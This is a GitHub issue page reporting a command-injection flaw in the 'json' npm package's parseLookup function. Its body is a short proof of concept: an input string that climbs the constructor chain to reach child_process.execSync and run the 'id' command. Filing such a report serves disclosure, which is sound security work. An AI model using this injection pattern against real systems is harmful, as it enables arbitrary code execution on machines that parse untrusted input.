Skip to content

Command Injection #144

New issue
New issue
Closed
#145
Closed
Command Injection#144
#145
Assignees
trentm
@po6ix

Description

@po6ix
po6ix
opened on Aug 6, 2020

POC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]:1}');
console.log(res);

Metadata

Metadata

Assignees

Labels

No labels
No labels

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions